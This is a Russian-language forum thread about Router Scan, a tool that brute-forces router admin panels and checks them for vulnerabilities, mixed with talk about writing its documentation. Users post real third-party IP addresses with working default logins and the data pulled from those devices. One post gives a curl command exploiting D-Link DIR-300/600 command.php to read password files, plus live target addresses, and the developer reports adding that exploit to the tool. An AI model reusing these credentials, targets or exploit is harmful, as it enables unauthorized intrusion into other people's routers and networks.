прога Router Scan

BUFFALO: DD-WRT, model: WHR-HP-G300N
http://109.199.230.83:8080/ admin:samsung
http://rghost.net/6FynnwyyM , http://rghost.net/64JRLRCBn

BUFFALO: DD-WRT, model: WZR-HP-G300NH
http://93.183.151.143:8080/ admin:admin
http://rghost.net/62Bt7N6pk

 

Уже оффлайн.

Да, будет, я в нём разобрался. Добавил.

Хочу предупредить тех, кто скидывает новые роутеры, на буднях у меня практически нет времени на разработку, пилю в основном на выходных.

Посмотрите в настройках, генерация гудов могла отключиться.

 

Здравствуйте, вчера пользовался программой, была выбрана вкладка Good Results, появилась ошибка со значением 1469( к сожалению случайно закрыл не сделал скрин), удачные результаты программа больше не сохраняла, в таблице(в которую все сохранил) и в самой программе их было ровно 1469. У меня одного такая проблема?

 

спасибо

 

Нашел желающих?
Могу предложить помощь.
- скриншоты делать умею
- Документации с скриншотами в ворде приходилось делать вот пример
- знаю в среднем качестве HTML, CSS
- могу снять обучающее видео

 

Вы первый, кто предложил.

Требования самые минимальные - текстовое описание функций + скриншоты к ним. В HTML я уже сам всё оформлю, и допишу в нужных местах, где есть "подводные камни".

Надеюсь на вашу безвозмездную помощь! Результаты можно скидывать на файлообменник, и прямо сюда в тему. Было бы здорово, если каждый добавил что-то от себя, дополнив документацию, поскольку в этой теме давались ответы на многие вопросы. И я уверен, что многие участники темы уже достаточно компетентны в этом.

P.S. в документации упомяну никнеймы тех, кто помогал (по желанию конечно)

 

ну и отлично..

Spoiler

прочел все 60 страниц и впринципе у всех одни и те же вопросы. а про пароль к архиву который не могут найти на сайте и комментарий про танки.. - смеялся долго

Тогда с Вашего позволения оформлю все в Word.

Можно получить в личку Ваши данные(скупе,аська) для уточнения некоторых вопросов (в которых сам запутался)

И желательно получить ссылку на последнюю версию что бы скриншоты были актуальные

 

Нет данных по данному роутеру:
195.49.185.19:80 admin:admin TP-LINK WindRiver Router

 

Уже добавил.

Code:

Address: http://195.49.185.19/
Time: 94 ms
Authorization: admin:admin
Device: TP-LINK TL-ER6120
BSSID: <not implemented>
LAN IP: 10.49.1.11
LAN Subnet Mask: 255.255.255.0
WAN IP: 195.49.185.19
WAN Subnet Mask: 255.255.255.248
WAN Gateway: 195.49.185.17
Domain Name Servers: 77.243.0.12 77.243.0.27

Поскольку беспроводные с такой прошивкой мне ещё не встречались, оставил <not implemented> в BSSID.

 

Начал писать, критика принимается

Spoiler: Инструкция

http://rghost.ru/8YfcGw5hm

Как сюда прикреплять файлы, без обменника ?

 

В каких-то темах я видел возможность прикрепления, но тут вроде её нет.

 

Небольшое уточнение:
"В корне папки с программой всего 2 файла..." - это отностися к бета-версии. В релизе (по крайней мере, так было раньше) будет и libeay32.dll, и msvcr100.dll. Соответственно, ошибок, связанных с отсутствием библиотек, быть не должно - стоит ли писать об этом в документации?

Spoiler: В Инструкцию

Из коментариев на сайте программы:

Scanning modules:

• Router Scan (main) - Основной модуль сканирования роутеров, отвечает за подбор пароля к админке, и за получение информации
• Detect proxy servers - Обнаруживает прокси серверы протокола HTTP, и оповещает в случае удачи - в колонку Type в скобках будет дописано "proxy server", а в колонку WAN IP Address - реальный внешний адрес прокси сервера.
• Use HNAP 1.0 - Проверяет хост на наличие поддержки протокола Home Network Administration Protocol v1.0 и уязвимостей в нём. В случае обнаружения поддержки запишет "HNAP Info" в столбец Type. Если уязвимость будет обнаружена - запишет также настройки беспроводной сети.
• SQLite Manager RCE - Данный модуль добавлен в качестве бонуса, к роутерам отношения не имеет. Он определяет уязвимые сервера SQLite, в которых имеется уязвимость выполнения произвольного PHP кода. В случае обнаружения запишет информацию в колонку Comment.
• Hudson Java Servlet - Данный модуль добавлен в качестве бонуса, к роутерам отношения не имеет. Он определяет уязвимые сервера Hudson CI (а также Jenkins CI), в которых имеется уязвимость выполнения произвольного Java кода. В случае обнаружения запишет информацию в колонку Comment.

Также, важно знать, что модули работают друг за другом - они могут перезаписать информацию в колонках, которую получил предыдущий модуль.

Spoiler: В Инструкцию

Из коментариев на сайте программы:

Режимы сканирования:

1. Режим Normal. Оптимизирован для работы через беспроводную сеть (т.е. когда вы подключены через Wi-Fi), также он не забивает канал соединениями и удобен, когда вам нужно во время сканирования пользоваться интернетом. Технические характеристики: задержка 15 мс между каждой парой IP/порт
2. Режим Fast Scan. Оптимизирован для работы через Ethernet (когда вы подключены по кабелю). Данный режим может вызвать проблемы, когда вы используете Wi-Fi в качестве основного соединения. Технические характеристики: задержка 15 мс между каждым IP-адресом, все указанные порты проверяются в один момент
3. Режим Ultra Fast. Может применяться при высокоскоростном соединении (1 Гбит/с и выше) на высокопроизводительных машинах. Используйте этот режим на свой страх и риск, т.к. на неподходящей конфигурации системы, он может оборвать соединение с интернетом на долгое время, вызвать отказ в обслуживании вашего интернет провайдера, или нанести вред сетевому адаптеру. Технические характеристики: без задержек, задействуются сразу все доступные потоки
   

 

Spoiler: В Инструкцию

2 – Max. Threads - время жизни потока (мс) { в config.ini - Threads=300 }
тут скорее не время жизни, а максимальное количество потоков...

 

Внёс некоторые правки и совместил в одном архиве.
http://rghost.ru/7sN4RTKdl

Пожелания и замечания в перемешку:
1. Не нужно составлять полной инструкции - о структуре, разделах и т.п. я позабочусь сам

2. Относительно разделов "Работа с полученными данными" и "Использование полученных данных", инструкция должна учитывать, что программа используется в легитимных целях. Упомянуть различные фичи вроде VPN и проникновения в сети - можно, но только в рамках пентестинга. Инструкция должна быть больше ориентирована на помощь при работе с программой, но не с роутерами (кому надо - сам найдёт)

Spoiler: Цитата

Для тех кто играет в танки пишите через “-”

3. Подсказки для непонимающих пользователей лучше не добавлять / минимизировать

Spoiler: Цитата

*Добавить бы вкладку в которой были бы только все НЕ успешно вскрытые роутеры, для повторного пересканирования (добавление роутера, найденный хак,….).

4. Зачем писать пожелания/комментарии в инструкцию? Вы ведь пишете не мне лично, а людям.

5. Не делайте рисунки очень большими, делайте окно так, чтобы были видны все необходимые / описываемые элементы

6. Окна и их элементы лучше описывать по очереди, при необходимости ссылаясь на разделы ниже/выше. Рекурсивный метод описания хуже воспринимается читателем

Ну вот, на первый взгляд как-то так.

 

binarymaster, вопрос по поводу вебкамер (ipкамер,видеорегистраторов и прочего) при скане часто попадаются они, но практически не детектируются...
в чем вопрос то (даже пожелание): есть ли в планах сделать поддержку камер (по сути она и так есть, но более побольше внимания им уделить), правда там есть свои нюансы: для просмотра в браузере большинство заточено под IE, каждый вендор имеет свой плагин, но для успешной авторизации плагин не нужен..

P.S.: перечитал - сам не понял что написал (немного пьян), но фак остаётся фактом, поддержка камер значительно бы увеличила привлекательность вашей программы... так же готов предоставить посильную помощ если возникнут какие трудности в реализации....

 

Я все таки хочу составить полную (дается мне она и останется в word )

Пожелания и Вопросы отправлю лично Вам на почту

Спасибо за дополнения. Поправлю после получения финальной версии.

Продолжаю писать. Скоро будет финальная версия. Принимаю критику.

Spoiler: Инструкция beta v0.2

http://rghost.ru/87DFH4M6v

Вопрос ко всем.
Нужна ли подобная инструкция ?

Spoiler: Применение RS

http://rghost.ru/8Bfm9gc6H

Если да то нужна помощь, я не во всем разбираюсь.
Для чего? - может статью напишу.

 

Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14):
http://www.s3cur1ty.de/m1adv2013-003

tl;dr
Получение пароля:

Code:

curl --data "cmd=cat /var/passwd" http://ip/command.php

http://79.l65.122.75/
http://89.96.28.143:808O/
http://82.176.188.42:808O/

 

Ну хорошо. Просто учтите, что всё это будет переработано моим мозгом для помещения в документацию в нужном формате.)

Spoiler: Цитата

6 – Search – хз…….
Расписывать надо?

Поиск по выбранной таблице. Можно искать совпадение текста (с учётом регистра или без) выше или ниже выбранной ячейки, либо вывести сразу все результаты поиска (галка All).

Spoiler: Цитата

phpMyAdmin RCE – Нужно описание

Проверка уязвимости phpMyAdmin на выполнение произвольного php кода (только проверка, эксплойт пока не реализован).
https://www.exploit-db.com/exploits/8921/

Spoiler: Цитата

9 – Вкладки с полученными данными:
1 – все найденные
2 – успешно вскрытые
3 – хз…….

3 - таблица, содержащая результаты поиска

Spoiler: Цитата

1) SYN snd times хз…….

Сколько раз отправлять пакет TCP SYN (запрос на соединение с портом).

Spoiler: Цитата

1) Silent Mode хз…..

Тихий режим позволяет запустить программу без видимого окна, и сразу запустить сканирование. При этом выводится значок в системном лотке, по которому можно показать окно, и после завершения сканирования результаты будут сохранены в файл (даже если автосохранение выключено).

Spoiler: Цитата

1) Галочка + функционал хз…..

Позволяет сохранять результаты на диск в автоматическом режиме (по определённому интервалу и в выбранном формате, файлы сохраняются в папку с программой).

Spoiler: Цитата

1) Хз ……..

Custom detection page - позволяет задать иную страницу устройства, которая будет изначально запрошена для определения модели. Имеет смысл использовать для устройств Cisco SPA, которые по умолчанию просят логин пользователя "spa user", а для логина под админом требуется использовать адрес http://IPaddr/admin/ на котором будет выдано предложение "spa admin".

Spoiler: Цитата

1) Suggest хз………….

Предположить PIN код, согласно OUI мак адреса.

Spoiler: Цитата

4) GrabfromJSW (принцип работы ?? Кто разобрался)

Считывает BSSID-ы из таблицы запущенной программы Atheros JumpStart Wireless (также известной как TP-LINK QSS).

Spoiler: Цитата

5) Algorihms – известные алгоритмы подбора пинов

Позволяет посмотреть, какие алгоритмы поддерживаются генератором, встречающиеся OUI мак адресов, техническая информация по алгоритмам и ссылки на них.

Spoiler: Цитата

1) Scan selected table

Если в выбранной таблице есть роутеры с PIN-кодами, данная функция позволит проверить, какие пин коды соответствуют реализованным алгоритмам генерации. Результаты будут выведены в колонку комментариев.

 

Пишите, пригодится.

Если какие-либо камеры содержат настройки беспроводной сети - присылайте их IP адреса для изучения и добавления в поддержку. Я никогда не планирую добавление моделей, я добавляю в поддержку то, что мне присылают, либо что нахожу сам.

Благодарю! Исследую...

 

Уязвимость присутствует, но файл /var/passwd на всех устройствах пуст. Есть идеи?

UPD:
/var/etc/httpasswd тоже.

UPD 2:
Разобрался, добавил эксплойт в Router Scan.